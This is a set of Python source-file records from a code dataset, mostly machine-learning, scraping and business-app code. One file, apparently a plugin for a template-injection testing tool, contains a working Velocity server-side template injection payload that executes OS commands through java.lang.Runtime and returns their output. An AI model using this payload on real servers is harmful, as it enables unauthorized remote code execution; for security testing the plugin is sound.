'/feats_delta_5fr_sp_bi.scp')\n test_lablreader = None\n #test_lablreader = kaldiIO.LabelReader(aligdir + '/labels.scp')\n #uid_list_lab = test_lablreader.get_uid_list()\n #test_featreader.remove_lab_difference(uid_list_lab)\n # get the shuffled order of the feat list, and shuffle the lable list with the order\n #scp_order = test_featreader.get_scp_order()\n #test_lablreader.shuffle_utt(scp_order)\n\n dispenser = batchdispenser.TestBatchDispenser(test_featreader, FLAGS.test_labels, \n test_lablreader, int(FLAGS.test_batch_size))\n\n # Create the test image and labels placeholders\n self.test_input_placeholder = tf.placeholder(dtype=tf.float32, shape=[FLAGS.test_batch_size,\n INPUT_HEIGHT, INPUT_WIDTH, INPUT_DEPTH])\n\n # Build the test graph\n logits = inference(self.test_input_placeholder, FLAGS.num_residual_blocks, \n self.is_training_placeholder)\n #use_softmax = FLAGS.test_use_softmax\n #if use_softmax:\n # logits = tf.nn.softmax(logits)\n\n # Initialize a new session and restore a checkpoint\n saver = tf.train.Saver(tf.all_variables())\n sess = tf.Session()\n\n saver.restore(sess, FLAGS.test_ckpt_path)\n print ('Model restored from ', FLAGS.test_ckpt_path)\n\n total_logits_array = []\n uids = []\n # Test by batches\n #zero_batch = np.zeros((128, 40, 11, 3))\n #zero_logit_array = sess.run(logits, feed_dict={self.test_input_placeholder: zero_batch,\n # self.is_training_placeholder: False})\n #print (\"zero_logit: {}\".format(zero_logit_array))\n #print (\"zero_logit_shape: {}\".format(zero_logit_array.shape))\n #zero_pred = zero_logit_array[0]\n #print (zero_pred.shape)\n #print (\"!!!!!!!!!!!!!!!!!!!!!!!!!!\")\n count = 0\n for i in range(dispenser.num_utt()):\n utt_logits_array = np.array([]).reshape(-1, NUM_CLASS)\n num_frames, utt_id = dispenser.fetch_utt()\n num_batches = dispenser.num_batches()\n for step in range(num_batches):\n test_batch, _, _ = dispenser.get_batch()\n test_batch = np.array(self.stack_batch(test_batch))\n #print (\"batch {}: {}\".format(step, test_batch))\n #print (50 * \"=\")\n batch_logits_array = sess.run(logits,\n feed_dict={self.test_input_placeholder: test_batch,\n self.is_training_placeholder: False})\n\n utt_logits_array = np.concatenate((utt_logits_array, batch_logits_array))\n print (\"{}th utterance: {} -----------\".format(i, utt_id))\n print (\"num_frame: {}\".format(num_frames))\n print (\"utt_logits length: {}\".format(utt_logits_array.shape[0]))\n print (\"num_zeros_frames: {}\".format(utt_logits_array[num_frames:].shape))\n #print (utt_logits_array)\n #print (50 * \"-\")\n #print (utt_logits_array[num_frames:])\n\n #for i in range(utt_logits_array[num_frames:].shape[0]):\n # if not np.array_equal(zero_pred, utt_logits_array[num_frames:][i]):\n # print (\"@@@@@@@@@@@@@@@@@@@@@@@@@\")\n\n utt_logits_array = utt_logits_array[:num_frames]\n print (\"num_nonzeros_frames: {}\".format(utt_logits_array.shape))\n uids.append(utt_id)\n total_logits_array.append(utt_logits_array)\n\n print (\"num_utt: {}, {}\".format(len(uids), len(total_logits_array)))\n\n with kaldiIO.TableWriter(FLAGS.test_dir + '/test_pred.scp', FLAGS.test_dir + '/test_pred.ark') as pred_writer:\n for uid, logits in zip(uids, total_logits_array):\n pred_writer.write(str(uid), logits)\n print (\"---- Done testing ----\")\n\n\n\n ## Helper functions\n def loss(self, logits, labels):\n '''\n Calculate the cross entropy loss given logits and true labels\n :param logits: 2D tensor with shape [batch_size, num_labels]\n :param labels: 1D tensor with shape [batch_size]\n :return: loss tensor with shape [1]\n '''\n labels = tf.cast(labels, tf.int64)\n cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits,\n labels=labels, name='cross_entropy_per_example')\n cross_entropy_mean = tf.reduce_mean(cross_entropy, name='cross_entropy')\n return cross_entropy_mean\n\n def top_k_error(self, predictions, labels, k):\n '''\n Calculate the top-k error\n :param predictions: 2D tensor with shape [batch_size, num_labels]\n :param labels: 1D tensor with shape [batch_size, 1]\n :param k: int\n :return: tensor with shape [1]\n '''\n batch_size = predictions.get_shape().as_list()[0]\n in_top1 = tf.to_float(tf.nn.in_top_k(predictions, labels, k=1))\n num_correct = tf.reduce_sum(in_top1)\n return (batch_size - num_correct) / float(batch_size)\n\n def generate_vali_batch(self, vali_data, vali_label, vali_batch_size):\n '''\n If you want to use a random batch of validation data to validate instead of using the\n whole validation data, this function helps you generate that batch\n :param vali_data: 4D numpy array\n :param vali_label: 1D numpy array\n :param vali_batch_size: int\n :return: 4D numpy array and 1D numpy array\n '''\n offset = np.random.choice(10000 - vali_batch_size, 1)[0]\n vali_data_batch = vali_data[offset:offset + vali_batch_size, ...]\n vali_label_batch = vali_label[offset:offset + vali_batch_size]\n return vali_data_batch, vali_label_batch\n\n def train_operation(self, global_step, total_loss, top1_error):\n '''\n Defines train operations\n :param global_step: tensor variable with shape [1]\n :param total_loss: tensor with shape [1]\n :param top1_error: tensor with shape [1]\n :return: two operations. Running train_op will do optimization once. Running train_ema_op\n will generate the moving average of train error and train loss for tensorboard\n '''\n # Add train_loss, current learning rate and train error into the tensorboard summary ops\n #tf.summary.scalar('learning_rate', self.lr_placeholder)\n #tf.summary.scalar('train_loss', total_loss)\n #tf.summary.scalar('train_top1_error', top1_error)\n\n # The ema object help calculate the moving average of train loss and train error\n ema = tf.train.ExponentialMovingAverage(FLAGS.train_ema_decay, global_step)\n train_ema_op = ema.apply([total_loss, top1_error])\n #tf.summary.scalar('train_top1_error_avg', ema.average(top1_error))\n #tf.summary.scalar('train_loss_avg', ema.average(total_loss))\n\n #opt = tf.train.MomentumOptimizer(learning_rate=self.lr_placeholder, momentum=0.9)\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(update_ops):\n opt = tf.train.AdamOptimizer(learning_rate=self.lr_placeholder)\n train_op = opt.minimize(total_loss, global_step=global_step)\n return train_op, train_ema_op\n\n def validation_op(self, validation_step, top1_error, loss):\n '''\n Defines validation operations\n :param validation_step: tensor with shape [1]\n :param top1_error: tensor with shape [1]\n :param loss: tensor with shape [1]\n :return: validation operation\n '''\n\n # This ema object help calculate the moving average of validation loss and error\n\n # ema with decay = 0.0 won't average things at all. This returns the original error\n ema = tf.train.ExponentialMovingAverage(0.0, validation_step)\n ema2 = tf.train.ExponentialMovingAverage(0.95, validation_step)\n\n val_op = tf.group(validation_step.assign_add(1), ema.apply([top1_error, loss]),\n ema2.apply([top1_error, loss]))\n top1_error_val = ema.average(top1_error)\n top1_error_avg = ema2.average(top1_error)\n loss_val = ema.average(loss)\n loss_val_avg = ema2.average(loss)\n\n # Summarize these values on tensorboard\n #tf.summary.scalar('val_top1_error', top1_error_val)\n #tf.summary.scalar('val_top1_error_avg', top1_error_avg)\n #tf.summary.scalar('val_loss', loss_val)\n #tf.summary.scalar('val_loss_avg', loss_val_avg)\n return val_op\n\n def full_validation(self, loss, top1_error, vali_dispenser, session):\n '''\n Runs validation on all the 10000 valdiation images\n :param loss: tensor with shape [1]\n :param top1_error: tensor with shape [1]\n :param session: the current tensorflow session\n :param vali_data: 4D numpy array\n :param vali_labels: 1D numpy array\n :param batch_data: 4D numpy array. training batch to feed dict and fetch the weights\n :param batch_label: 1D numpy array. training labels to feed the dict\n :return: float, float\n '''\n #num_batches = 10000 // FLAGS.validation_batch_size\n #order = np.random.choice(10000, num_batches * FLAGS.validation_batch_size)\n #vali_data_subset = vali_data[order, ...]\n #vali_labels_subset = vali_labels[order]\n\n loss_list = []\n error_list = []\n\n end_vali_set = False\n #for x in range(100):\n count = 0\n while not end_vali_set:\n count += 1\n vali_feat_batch, vali_labl_batch, end_vali_set = vali_dispenser.get_batch()\n if vali_feat_batch == []:\n continue\n vali_feat_batch = np.array(self.stack_batch(vali_feat_batch))\n #print (vali_feat_batch.shape)\n #print ([int(FLAGS.validation_batch_size), INPUT_HEIGHT, INPUT_WIDTH, INPUT_DEPTH])\n assert (vali_feat_batch.shape == (int(FLAGS.validation_batch_size), INPUT_HEIGHT, INPUT_WIDTH, INPUT_DEPTH))\n\n #offset = step * FLAGS.validation_batch_size\n feed_dict = {#self.input_placeholder: batch_data, self.label_placeholder: batch_label,\n self.input_placeholder: vali_feat_batch,\n self.label_placeholder: vali_labl_batch,\n #self.reuse_placeholder: True,\n self.is_training_placeholder: False}\n loss_value, top1_error_value = session.run([loss, top1_error], feed_dict=feed_dict)\n loss_list.append(loss_value)\n error_list.append(top1_error_value)\n print ('Iter {} - Validation Batch Loss: {} | Validation Batch Error: {}'.format(count, loss_value, top1_error_value))\n\n return np.mean(loss_list), np.mean(error_list)\n\n def stack_batch(self, input):\n new_batch = []\n num_frames = input.shape[0]\n for i in range(num_frames):\n new_batch.append(self.reshape_frame(input[i], INPUT_HEIGHT, INPUT_DEPTH))\n return np.array(new_batch)\n\n def reshape_frame(self, frame, width, num_slice):\n res = [[] for _ in range(width)]\n len = frame.shape[0] \n stride = width * num_slice\n height = int(len / stride)\n for i in range(height):\n tmp = frame[i * stride: (i + 1) * stride]\n for j in range(width):\n tup = []\n for k in range(num_slice):\n tup.append(tmp[k * width + j])\n res[j].append(tup)\n return np.array(res)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--mode', choices=('train', 'test'), help='the mode to run the code')\n args = parser.parse_args()\n train = Train()\n if args.mode == 'train':\n # Initialize the Train object\n # Start the training session\n train.train()\n else:\n train.test()\n","sub_path":"resnet/resnet_1_train.py","file_name":"resnet_1_train.py","file_ext":"py","file_size_in_byte":28519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"518990636","text":"from utils.loggers import log\nfrom core.plugin import Plugin\nfrom core import closures\nfrom utils import rand\nfrom utils.strings import quote\n\nclass Velocity(Plugin):\n\n render_fmt = '#set($p=%(payload)s)\\n${p}\\n'\n header_fmt = '\\n#set($h=%(header)s)\\n${h}\\n'\n trailer_fmt = '\\n#set($t=%(trailer)s)\\n${t}'\n contexts = [\n { 'level': 1, 'prefix': '%(closure)s)', 'suffix' : '', 'closures' : closures.java_ctx_closures },\n \n # This catches \n # #if(%s == 1)\\n#end \n # #foreach($item in %s)\\n#end\n # #define( %s )a#end\n { 'level': 3, 'prefix': '%(closure)s#end#if(1==1)', 'suffix' : '', 'closures' : closures.java_ctx_closures },\n { 'level': 5, 'prefix': '*#', 'suffix' : '#*' },\n\n ]\n \n def detect_engine(self):\n\n expected_rand = str(rand.randint_n(1))\n payload = '#set($p=%(payload)s)\\n$p\\n' % ({ 'payload': expected_rand })\n\n if expected_rand == self.inject(payload):\n self.set('language', 'java')\n self.set('engine', 'velocity')\n\n def detect_exec(self):\n\n expected_rand = str(rand.randint_n(2))\n\n if expected_rand == self.execute('echo %s' % expected_rand):\n self.set('exec', True)\n self.set('os', self.execute(\"uname\"))\n\n def execute(self, command):\n\n # I've tested the techniques described in this article\n # http://blog.portswigger.net/2015/08/server-side-template-injection.html\n # for it didn't work. Still keeping the check active to cover previous\n # affected versions.\n\n return self.inject(\"\"\"#set($str=$class.inspect(\"java.lang.String\").type)\n#set($chr=$class.inspect(\"java.lang.Character\").type)\n#set($ex=$class.inspect(\"java.lang.Runtime\").type.getRuntime().exec(\"%s\"))\n$ex.waitFor()\n#set($out=$ex.getInputStream())\n#foreach($i in [1..$out.available()])\n$str.valueOf($chr.toChars($out.read()))\n#end\"\"\" % (quote(command)))\n","sub_path":"plugins/engines/velocity.py","file_name":"velocity.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"249152624","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jan 9 16:46:58 2021\r\n\r\n@author: ANIL\r\n\"\"\"\r\n\r\n\r\ndef show_messages(messages):\r\n sent_msg = []\r\n while messages:\r\n message = messages.pop()\r\n print(message)\r\n sent_msg.insert(0, message)\r\n\r\n return sent_msg\r\n\r\n\r\nmessages = ['Delhi is capital of India', 'Indian cricket team captain is Virat',\r\n 'Amitabh is film actor.']\r\nmsgs = show_messages(messages[:])\r\nprint(messages)\r\nprint(msgs)\r\n","sub_path":"Python Crash Course/vAnil/Chapter-8/8-11.py","file_name":"8-11.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"254638620","text":"from .SourceWebSite import SourceWebSite\n\n\nclass MediaMarktTR(SourceWebSite):\n base_url = \"https://www.mediamarkt.com.tr\"\n source_name = 'MediaMarktTR'\n\n def get_results(self, url):\n content = self.get_content(url['url'])\n\n if content and content.find(\"ul\", \"products-list\"):\n page_number = int(\n content.find(\"ul\", \"pagination\").find_all(\"li\")[-2].text if content.find(\"ul\", \"pagination\") else '1')\n page_number = self.max_page if page_number > self.max_page else page_number\n\n self.results += self.get_products(content, url['search'])\n if page_number > 1:\n page_list = [url['url'] + '&page=' + str(number) for number in range(2, page_number)]\n contents = self.get_contents(page_list)\n for content in contents:\n self.results += self.get_products(content, url['search'])\n else:\n pass\n elif content and content.find(\"div\", id=\"product-details\"):\n self.results += self.get_product(content, url['search'])\n else:\n pass\n\n @staticmethod\n def get_categories():\n categories = {\n 'All': 'query={search2}&searchProfile=onlineshop&channel=mmtrtr',\n 'Notebooks': 'searchParams=%2FSearch.ff%3Fquery%3D{search1}%26filterTabbedCategory%3Donlineshop%26filteravailability%3D1%26filterCategoriesROOT%3DBilgisayar%25C2%25A7MediaTRtrc504925%26filterCategoriesROOT%252FBilgisayar%25C2%25A7MediaTRtrc504925%3DTa%25C5%259F%25C4%25B1nabilir%2BBilgisayarlar%25C2%25A7MediaTRtrc504926%26channel%3Dmmtrtr%26productsPerPage%3D20%26disableTabbedCategory%3Dtrue&searchProfile=onlineshop&query={search2}&sort=price&page=&sourceRef=INVALID',\n 'Smartphones': 'searchParams=%2FSearch.ff%3Fquery%3D{search1}%26filterTabbedCategory%3Donlineshop%26filteravailability%3D1%26filterCategoriesROOT%3DTelefon%25C2%25A7MediaTRtrc465595%26filterCategoriesROOT%252FTelefon%25C2%25A7MediaTRtrc465595%3DCep%2BTelefonlar%25C4%25B1%25C2%25A7MediaTRtrc504171%26channel%3Dmmtrtr%26productsPerPage%3D20%26disableTabbedCategory%3Dtrue&searchProfile=onlineshop&query={search2}&sort=price&sourceRef=INVALID',\n 'Monitors': 'searchParams=/Search.ff?query%3D{search1}%26filterTabbedCategory%3Donlineshop%26filteravailability%3D1%26filterCategoriesROOT%3DBilgisayar%2BBile%25C5%259Fenleri%25C2%25A7MediaTRtrc639556%26filterCategoriesROOT%252FBilgisayar%2BBile%25C5%259Fenleri%25C2%25A7MediaTRtrc639556%3DMonit%25C3%25B6r%25C2%25A7MediaTRtrc639581%26channel%3Dmmtrtr%26productsPerPage%3D20%26disableTabbedCategory%3Dtrue&searchProfile=onlineshop&query={search2}&sort=price&sourceRef=INVALID',\n }\n return categories\n\n @staticmethod\n def create_url(search, category):\n category = category.format(search1='%2B'.join(search.split()), search2='+'.join(search.split()))\n url = 'https://www.mediamarkt.com.tr/tr/search.html?{}'.format(category)\n return url\n\n def get_product(self, product, search):\n products = []\n\n product_name = product.find(\"h1\", {'itemprop': 'name'}).text.strip()\n if product.find(\"meta\", {'itemprop': 'price'}):\n product_price = product.find(\"meta\", {'itemprop': 'price'})['content'].split('.')[0] + ' TL'\n else:\n return products\n product_price_from = ''\n product_info = 'Ücretsiz Kargo' if product.find(\"span\", {\"data-layer\": \"deliveryinformation\"}) else ''\n product_comment_count = product.find(\"div\", \"rating\").findNext('span').text.strip() if product.find(\"div\",\n \"rating\") else ''\n suitable_to_search = self.is_suitable_to_search(product_name, search)\n products.append(\n {'source': '[{}]'.format(self.source_name), 'name': product_name, 'code': None, 'price': product_price,\n 'old_price': product_price_from, 'info': product_info, 'comment_count': product_comment_count,\n 'suitable_to_search': suitable_to_search})\n # print(product_name,product_price,product_info,product_comment_count)\n\n return products\n\n def get_products(self, content, search):\n products = []\n\n for product in content.find(\"ul\", class_=\"products-list\").find_all(\"li\", recursive=False):\n if product.has_attr('class'):\n continue\n product_name = product.find(\"h2\").text.strip()\n if product.find(\"div\", class_='price small'):\n product_price = product.find(\"div\", class_='price small').text.split(',')[0] + ' TL'\n else:\n continue\n product_price_from = product.find(\"div\", class_='price price-xs price-old').text.split(',')[\n 0] + ' TL' if product.find(\"div\", class_='price price-xs price-old') else '1'\n product_info = ' '.join(\n product.find(\"span\", {\"data-layer\": \"deliveryinformation\"}).parent.text.split()) if product.find(\"span\",\n {\n \"data-layer\": \"deliveryinformation\"}) else ''\n product_comment_count = product.find(\"div\", \"rating\").findNext('a').text.strip() if product.find(\"div\",\n \"rating\") else ''\n suitable_to_search = self.is_suitable_to_search(product_name, search)\n products.append(\n {'source': '[{}]'.format(self.source_name), 'name': product_name, 'code': None, 'price': product_price,\n 'old_price': product_price_from, 'info': product_info,\n 'comment_count': product_comment_count, 'suitable_to_search': suitable_to_search})\n # print(product_name,product_price,product_info,product_comment_count)\n return products\n","sub_path":"QuickSearch/websites/MediaMarktTR.py","file_name":"MediaMarktTR.py","file_ext":"py","file_size_in_byte":6118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"178310514","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2015, Frappe Technologies and contributors\n# For license information, please see license.txt\n\nfrom __future__ import unicode_literals\nimport frappe\nfrom frappe.model.document import Document\nfrom frappe import _\nfrom erpnext.schools.utils import validate_duplicate_student\nfrom erpnext.schools.api import get_student_batch_students\n\nclass StudentGroup(Document):\n\tdef validate(self):\n\t\tself.validate_mandatory_fields()\n\t\tself.validate_strength()\n\t\tself.validate_students()\n\t\tvalidate_duplicate_student(self.students)\n\n\tdef validate_mandatory_fields(self):\n\t\tif self.group_based_on == \"Course\" and not self.course:\n\t\t\tfrappe.throw(_(\"Please select Course\"))\n\t\telif self.group_based_on == \"Batch\" and (not self.program or not self.batch):\n\t\t\tfrappe.throw(_(\"Please select Program and Batch\"))\n\n\tdef validate_strength(self):\n\t\tif self.max_strength and len(self.students) > self.max_strength:\n\t\t\tfrappe.throw(_(\"\"\"Cannot enroll more than {0} students for this student group.\"\"\").format(self.max_strength))\n\n\tdef validate_students(self):\n\t\tprogram_enrollment = get_program_enrollment(self.academic_year, self.group_based_on, self.program, self.batch, self.course)\n\t\tstudents = [d.student for d in program_enrollment] if program_enrollment else None\n\t\tfor d in self.students:\n\t\t\tif self.group_based_on != \"Activity\" and d.student not in students:\n\t\t\t\tfrappe.throw(_(\"{0} - {1} is not enrolled in the given {2}\".format(d.student, d.student_name, self.group_based_on)))\n\t\t\tif not frappe.db.get_value(\"Student\", d.student, \"enabled\") and d.active:\n\t\t\t\td.active = 0\n\t\t\t\tfrappe.throw(_(\"{0} - {1} is inactive student\".format(d.student, d.student_name)))\n\n@frappe.whitelist()\ndef get_students(academic_year, group_based_on, program=None, batch=None, course=None):\n\tenrolled_students = get_program_enrollment(academic_year, group_based_on, program, batch, course)\n\n\tif enrolled_students:\n\t\tstudent_list = []\n\t\tfor s in enrolled_students:\n\t\t\tif frappe.db.get_value(\"Student\", s.student, \"enabled\"):\n\t\t\t\ts.update({\"active\": 1})\n\t\t\telse:\n\t\t\t\ts.update({\"active\": 0})\n\t\t\tstudent_list.append(s)\n\t\treturn student_list\n\ndef get_program_enrollment(academic_year, group_based_on, program=None, batch=None, course=None):\n\tif group_based_on == \"Batch\":\n\t\treturn frappe.db.sql('''select student, student_name from `tabProgram Enrollment` where academic_year = %s\n\t\t\tand program = %s and student_batch_name = %s order by student_name asc''',(academic_year, program, batch), as_dict=1)\n\n\telif group_based_on == \"Course\":\n\t\treturn frappe.db.sql('''\n\t\t\tselect \n\t\t\t\tpe.student, pe.student_name \n\t\t\tfrom \n\t\t\t\t`tabProgram Enrollment` pe, `tabProgram Enrollment Course` pec\n\t\t\twhere\n\t\t\t\tpe.name = pec.parent and pec.course = %s\n\t\t\torder by\n\t\t\t\tpe.student_name asc\n\t\t\t''', (course), as_dict=1)","sub_path":"erpnext/schools/doctype/student_group/student_group.py","file_name":"student_group.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"386956521","text":"''' A toy example of training single-agent algorithm on Leduc Hold'em\n The environment can be treated as normal OpenAI gym style single-agent environment\n'''\n\nimport tensorflow as tf\nimport numpy as np\n\nimport rlcard\nfrom rlcard.agents.random_agent import RandomAgent\nfrom rlcard.agents.dqn_agent import DQNAgent\nfrom rlcard.utils.utils import set_global_seed\nfrom rlcard.utils.logger import Logger\n\n# Make environment and enable single mode\nenv = rlcard.make('uno')\neval_env = rlcard.make('uno')\nenv.set_mode(single_agent_mode=True)\neval_env.set_mode(single_agent_mode=True)\n\n# Set the iterations numbers and how frequently we evaluate/save plot\nevaluate_every = 1000\nsave_plot_every = 1000\nevaluate_num = 10000\ntimesteps = 1000000\n\n# Set the the number of steps for collecting normalization statistics\n# and intial memory size\nmemory_init_size = 1000\nnorm_step = 100\n\n# The paths for saving the logs and learning curves\nroot_path = './experiments/leduc_holdem_single_agent_dqn_result/'\nlog_path = root_path + 'log.txt'\ncsv_path = root_path + 'performance.csv'\nfigure_path = root_path + 'figures/'\n\n# Set a global seed\nset_global_seed(0)\n\nwith tf.Session() as sess:\n global_step = tf.Variable(0, name='global_step', trainable=False)\n agent = DQNAgent(sess,\n scope='dqn',\n action_num=env.action_num,\n replay_memory_size=int(1e5),\n replay_memory_init_size=memory_init_size,\n norm_step=norm_step,\n state_shape=env.state_shape,\n mlp_layers=[128, 128])\n\n sess.run(tf.global_variables_initializer())\n\n # Init a Logger to plot the learning curve\n logger = Logger(xlabel='timestep', ylabel='reward', legend='DQN on Leduc Holdem', log_path=log_path, csv_path=csv_path)\n\n state = env.reset()\n\n for timestep in range(timesteps):\n action = agent.step(state)\n next_state, reward, done = env.step(action)\n ts = (state, action, reward, next_state, done)\n agent.feed(ts)\n\n train_count = timestep - (memory_init_size + norm_step)\n if train_count > 0:\n loss = agent.train()\n print('\\rINFO - Step {}, loss: {}'.format(timestep, loss), end='')\n\n if timestep % evaluate_every == 0:\n rewards = []\n state = eval_env.reset()\n for _ in range(evaluate_num):\n action = agent.eval_step(state)\n _, reward, done = env.step(action)\n if done:\n rewards.append(reward)\n logger.log('\\n########## Evaluation ##########')\n logger.log('Timestep: {} Average reward is {}'.format(timestep, np.mean(rewards)))\n\n # Add point to logger\n logger.add_point(x=env.timestep, y=float(reward)/evaluate_num)\n\n # Make plot\n if timestep % save_plot_every == 0:\n logger.make_plot(save_path=figure_path+str(timestep)+'.png')\n\n # Make the final plot\n logger.make_plot(save_path=figure_path+'final_'+str(timestep)+'.png')\n","sub_path":"examples/uno_single.py","file_name":"uno_single.py","file_ext":"py","file_size_in_byte":3073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"8573684","text":"\"\"\"\nMonte Carlo tree search reverse hex player with decisive move simulation policy\nby Isabel McCarten\nstarter code from Mopyhex at https://github.com/yotomyoto/mopyhex\n\"\"\"\nfrom rave_mctsagent import *\n\n\nclass DecisiveMoveMctsagent(RaveMctsagent):\n \n def __init__(self, state=Gamestate(8)):\n super().__init__(state)\n \n def special_case(self, last_move):\n \"\"\"Return a move found without search, None otherwise.\"\"\"\n size = self.rootstate.size\n moves = self.rootstate.moves()\n \n if size < 6:\n move = self.get_small_board_move(last_move, size, moves)\n if move is not None:\n return move\n \n move = self.get_starting_move(last_move, size, moves)\n return move\n\n def roll_out(self, state):\n \"\"\"\n Simulate a random game except that we play all known critical cells\n first, return the winning player and record critical cells at the end.\n \"\"\"\n moves = state.moves()\n good_moves = moves.copy()\n good_opponent_moves = moves.copy()\n to_play = state.turn()\n \n while(state.winner() == Gamestate.PLAYERS[\"none\"]):\n done = False\n while len(good_moves) > 0 and not done:\n move = random.choice(good_moves)\n good_moves.remove(move)\n if not state.would_lose(move, to_play):\n state.play(move)\n moves.remove(move)\n if move in good_opponent_moves:\n good_opponent_moves.remove(move)\n done = True\n \n if not done: \n move = random.choice(moves)\n state.play(move)\n moves.remove(move)\n if move in good_opponent_moves:\n good_opponent_moves.remove(move)\n \n good_moves, good_opponent_moves = good_opponent_moves, good_moves\n \n black_rave_pts = []\n white_rave_pts = []\n\n for x in range(state.size):\n for y in range(state.size):\n if state.board[(x,y)] == Gamestate.PLAYERS[\"black\"]:\n black_rave_pts.append((x,y))\n elif state.board[(x,y)] == Gamestate.PLAYERS[\"white\"]:\n white_rave_pts.append((x,y))\n\n return state.winner(), black_rave_pts, white_rave_pts","sub_path":"decisive_move_mctsagent.py","file_name":"decisive_move_mctsagent.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"191058091","text":"import curses\nimport os\nimport zipfile\nfrom output import OutputModule\nfrom input import InputModule\nfrom domains.Student import *\nfrom domains.Course import *\nfrom domains.Mark import *\n\n\nclass MainModule:\n # main\n s = int(student_num())\n l = 1\n while l <= s:\n l += 1\n add_student()\n show_list_student()\n\n c = int(number_course())\n p = 1\n while p <= c:\n p += 1\n add_course()\n show_list_course()\n\n create_mark()\n for i in range(0, len(Course)):\n ol = int(input(\"You Choose: \"))\n if ol == 1:\n print(\"--STUDENT MARK--\")\n show_mark()\n break\n\n\nmark_gpa()\nmark_cal()\n\npw5 = zipfile.ZipFile('D:\\\\Studies\\\\B2 subjects\\\\git\\\\pp2021\\\\pw5\\\\students.dat', \"w\")\n\nfor folder, subfolders, files in os.walk('D:\\\\Studies\\\\B2 subjects\\\\git\\\\pp2021\\\\pw5'):\n\n for file in files:\n if file.endswith('.py'):\n pw5.write(os.path.join(folder, file),\n os.path.relpath(os.path.join(folder, file), 'D:\\\\Studies\\\\B2 subjects\\\\git\\\\pp2021\\\\pw5\\\\'),\n compress_type=zipfile.ZIP_DEFLATED)\n\npw5 = zipfile.ZipFile('D:\\\\Studies\\\\B2 subjects\\\\git\\\\pp2021\\\\pw5\\\\students.dat')\npw5.extractall('D:\\\\Studies\\\\B2 subjects\\\\git\\\\pp2021\\\\pw5\\\\Compress and Decompress\\\\')\n\npw5.close()","sub_path":"pw5/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"534172028","text":"# -*- coding: utf-8 -*-\n# Copyright 2018 The Chromium OS Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\n\"\"\"Image API Service.\n\nThe image related API endpoints should generally be found here.\n\"\"\"\n\nfrom __future__ import print_function\n\nimport os\n\nfrom chromite.api.gen.chromite.api import image_pb2\nfrom chromite.lib import constants\nfrom chromite.lib import image_lib\nfrom chromite.service import image\n\n# The image.proto ImageType enum ids.\n_BASE_ID = image_pb2.Image.BASE\n_DEV_ID = image_pb2.Image.DEV\n_TEST_ID = image_pb2.Image.TEST\n\n# Dict to allow easily translating names to enum ids and vice versa.\n_IMAGE_MAPPING = {\n _BASE_ID: constants.IMAGE_TYPE_BASE,\n constants.IMAGE_TYPE_BASE: _BASE_ID,\n _DEV_ID: constants.IMAGE_TYPE_DEV,\n constants.IMAGE_TYPE_DEV: _DEV_ID,\n _TEST_ID: constants.IMAGE_TYPE_TEST,\n constants.IMAGE_TYPE_TEST: _TEST_ID,\n}\n\n\nclass Error(Exception):\n \"\"\"The module's base error class.\"\"\"\n\n\nclass InvalidImageTypeError(Error):\n \"\"\"Invalid image type given.\"\"\"\n\n\nclass InvalidArgumentError(Error):\n \"\"\"Invalid argument to an image service function.\"\"\"\n\n\ndef Create(input_proto, output_proto):\n \"\"\"Build an image.\n\n Args:\n input_proto (image_pb2.CreateImageRequest): The input message.\n output_proto (image_pb2.CreateImageResult): The output message.\n \"\"\"\n board = input_proto.build_target.name\n if not board:\n raise InvalidArgumentError('build_target.name is required.')\n\n image_types = set()\n # Build the base image if no images provided.\n to_build = input_proto.image_types or [_BASE_ID]\n for current in to_build:\n if current not in _IMAGE_MAPPING:\n # Not expected, but at least it will be obvious if this comes up.\n raise InvalidImageTypeError(\n \"The service's known image types do not match those in image.proto. \"\n 'Unknown Enum ID: %s' % current)\n\n image_types.add(_IMAGE_MAPPING[current])\n\n enable_rootfs_verification = not input_proto.disable_rootfs_verification\n version = input_proto.version or None\n disk_layout = input_proto.disk_layout or None\n builder_path = input_proto.builder_path or None\n build_config = image.BuildConfig(\n enable_rootfs_verification=enable_rootfs_verification, replace=True,\n version=version, disk_layout=disk_layout, builder_path=builder_path,\n )\n\n # Sorted isn't really necessary here, but it's much easier to test.\n result = image.Build(board=board, images=sorted(list(image_types)),\n config=build_config)\n\n output_proto.success = result.success\n if result.success:\n # Success -- we need to list out the images we built in the output.\n _PopulateBuiltImages(board, image_types, output_proto)\n else:\n # Failure -- include all of the failed packages in the output.\n for package in result.failed_packages:\n current = output_proto.failed_packages.add()\n current.category = package.category\n current.package_name = package.package\n if package.version:\n current.version = package.version\n\n return 1\n\n\ndef _PopulateBuiltImages(board, image_types, output_proto):\n \"\"\"Helper to list out built images for Create.\"\"\"\n # Build out the ImageType->ImagePath mapping in the output.\n # We're using the default path, so just fetch that, but read the symlink so\n # the path we're returning is somewhat more permanent.\n latest_link = image_lib.GetLatestImageLink(board)\n read_link = os.readlink(latest_link)\n if os.path.isabs(read_link):\n # Absolute path, use the linked location.\n base_path = os.path.normpath(read_link)\n else:\n # Relative path, convert to absolute using the symlink's containing folder.\n base_path = os.path.join(os.path.dirname(latest_link), read_link)\n base_path = os.path.normpath(base_path)\n\n for current in image_types:\n type_id = 